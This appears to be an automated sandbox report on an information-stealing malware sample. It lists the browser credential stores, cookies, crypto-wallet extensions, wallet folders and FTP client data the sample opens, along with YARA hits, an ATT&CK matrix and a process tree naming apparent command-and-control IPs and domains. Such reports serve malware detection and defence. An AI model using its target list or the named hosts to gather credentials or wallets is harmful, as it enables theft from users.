                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: Yara matchFile source: 0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.1991761925.0000000001246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.1957093991.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.2045528163.0000000001246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.1972196562.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.2076735987.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1372723744.0000000001458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR

                            Remote Access Functionality

                            Source: Yara match | File source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR
                            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                            Source: Yara match | File source: 0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.2769111008.0000000002BD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: flv2aviconverter24.exe PID: 2400, type: MEMORYSTR
                            Source: Yara match | File source: 00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1492478453.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
                            Source: Yara match | File source: dump.pcap, type: PCAP
                            Source: Yara match | File source: sslproxydump.pcap, type: PCAP

                            Mitre Att&ck Matrix

                            Each row below is one row of the report's ATT&CK matrix, one cell per tactic column. A number in front of a technique name is the matrix's signature-count badge for that technique, kept exactly as extracted.

                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | 1 Native API | 1 Windows Service | 1 Windows Service | 111 Deobfuscate/Decode Files or Information | LSASS Memory | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 41 Obfuscated Files or Information | Security Account Manager | 246 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 22 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1071 Security Software Discovery | SSH | Keylogging | 124 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Masquerading | DCSync | 461 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 461 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 2 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            Behavior Graph ID: 1604525 | Sample: AApUa7VQiy.exe | Startdate: 01/02/2025 | Architecture: WINDOWS | Score: 100

                            The graph's nodes are listed below as a process tree, rendered from the extracted node labels and edges; the bracketed number is the graph's node id, so the several skotes.exe, cmd.exe and f46bdbcca4.tmp nodes can be told apart.

                            [2] Start
                                DNS/IP: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC; DGGKjBirXBdcY.DGGKjBirXBdcY; 37 other IPs or domains
                                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 27 other signatures
                                Started: [14] skotes.exe; [19] AApUa7VQiy.exe; [21] skotes.exe

                            [14] skotes.exe (started by [2])
                                DNS/IP: 185.215.113.43, 53457, 53464, 53466 WHOLESALECONNECTIONSNL Portugal; 185.215.113.97, 53467, 53472, 53477 WHOLESALECONNECTIONSNL Portugal; 91.240.118.49, 443, 53465 GLOBALLAYERNL unknown
                                Dropped: C:\Users\user\AppData\...\6299d9e5a5.exe, PE32; C:\Users\user\AppData\...\513076b4b2.exe, PE32; C:\Users\user\AppData\...\d37c6a3c82.exe, PE32; 25 other malicious files
                                Signatures: Creates multiple autostart registry keys; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                Started: [23] infinity.exe; [26] f46bdbcca4.exe; [29] 179187318e.exe; [36] 3 other processes

                            [19] AApUa7VQiy.exe (started by [2])
                                DNS/IP: 185.215.113.16, 49776, 80 WHOLESALECONNECTIONSNL Portugal; warlikedbeliev.org 104.21.18.116, 443, 49707, 49708 CLOUDFLARENETUS United States
                                Dropped: C:\...S0PERDCSSGNQK1XTMK282189FFMR8.exe, PE32; C:\Users\...\BEB973FPO2R62ZWABVOVP8TC.exe, PE32
                                Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
                                Started: [31] BEB973FPO2R62ZWABVOVP8TC.exe; [33] ES0PERDCSSGNQK1XTMK282189FFMR8.exe

                            [21] skotes.exe (started by [2])
                                Signatures: Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

                            [23] infinity.exe (started by [14])
                                Dropped: C:\Users\user\AppData\Local\...\infinity.tmp, PE32
                                Started: [38] infinity.tmp

                            [26] f46bdbcca4.exe (started by [14])
                                Dropped: C:\Users\user\AppData\...\f46bdbcca4.tmp, PE32
                                Signatures: Multi AV Scanner detection for dropped file
                                Started: [41] f46bdbcca4.tmp

                            [29] 179187318e.exe (started by [14])
                                Dropped: C:\Users\user\AppData\Local\Temp\Put, data; C:\Users\user\AppData\Local\Temp\Japanese, data; 5 other malicious files
                                Signatures: Writes many files with high entropy
                                Started: [43] cmd.exe

                            [31] BEB973FPO2R62ZWABVOVP8TC.exe (started by [19])
                                Dropped: C:\Users\user\AppData\Local\...\skotes.exe, PE32
                                Signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Hides threads from debuggers
                                Started: [46] skotes.exe

                            [33] ES0PERDCSSGNQK1XTMK282189FFMR8.exe (started by [19])
                                DNS/IP: 185.215.113.115, 53302, 80 WHOLESALECONNECTIONSNL Portugal
                                Signatures: Tries to detect virtualization through RDTSC time measurements; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

                            [36] 3 other processes (started by [14])
                                DNS/IP: steamcommunity.com 104.102.49.254, 443, 53481 AKAMAI-ASUS United States
                                Dropped: C:\Users\user\AppData\Local\Temp\Soundtrack, data; C:\Users\user\AppData\Local\Temp\Plumbing, data; 3 other malicious files
                                Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); 4 other signatures
                                Started: [48] cmd.exe

                            [38] infinity.tmp (started by [23])
                                Dropped: C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32; C:\Users\user\AppData\...\unins000.exe (copy), PE32; C:\Users\user\AppData\Local\...\is-2E87P.tmp, PE32; 21 other files (11 malicious)
                                Started: [50] flv2aviconverter24.exe

                            [41] f46bdbcca4.tmp (started by [26])
                                Dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32; C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32
                                Started: [54] f46bdbcca4.exe

                            [43] cmd.exe (started by [29])
                                Dropped: C:\Users\user\AppData\Local\...\Avoiding.com, PE32
                                Signatures: Drops PE files with a suspicious file extension; Writes many files with high entropy
                                Started: [56] cmd.exe; [58] conhost.exe; [60] tasklist.exe; [67] 9 other processes

                            [46] skotes.exe (started by [31])
                                Signatures: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); 3 other signatures

                            [48] cmd.exe (started by [36])
                                Dropped: C:\Users\user\AppData\...\Macromedia.com, PE32
                                Started: [62] Macromedia.com; [65] cmd.exe; [69] 10 other processes

                            [50] flv2aviconverter24.exe (started by [38])
                                DNS/IP: 176.113.115.96 SELECTELRU Russian Federation; 193.176.153.180 AGROSVITUA unknown
                                Dropped: C:\ProgramData\Flv2AVIConverter\sqlite3.dll, PE32; C:\ProgramData\...\Flv2AVIConverter.exe, PE32

                            [54] f46bdbcca4.exe (started by [41])
                                Dropped: C:\Users\user\AppData\...\f46bdbcca4.tmp, PE32
                                Started: [71] f46bdbcca4.tmp

                            [56] cmd.exe (started by [43])
                                Dropped: C:\Users\user\AppData\Local\Temp\36469\L, data

                            [62] Macromedia.com (started by [48])
                                Dropped: C:\Users\user\AppData\...\AchillesGuard.com, PE32; C:\Users\user\AppData\Local\...\r, data
                                Signatures: Drops PE files with a suspicious file extension; Writes many files with high entropy

                            [65] cmd.exe (started by [48])
                                Dropped: C:\Users\user\AppData\Local\Temp\764661\F, data

                            [71] f46bdbcca4.tmp (started by [54])
                                Dropped: C:\Users\user\...\uxtheme_2.drv (copy), PE32+; C:\Users\user\AppData\Roaming\is-M72JG.tmp, PE32+; C:\Users\user\AppData\...\unins000.exe (copy), PE32; 4 other files (3 malicious)
                                Started: [74] regsvr32.exe

                            [74] regsvr32.exe (started by [71])
                                Started: [76] regsvr32.exe

                            [76] regsvr32.exe (started by [74])
                                Signatures: Suspicious powershell command line found; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Started: [79] powershell.exe

                            [79] powershell.exe (started by [76])
                                Signatures: Loading BitLocker PowerShell Module
                                Started: [82] conhost.exe

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.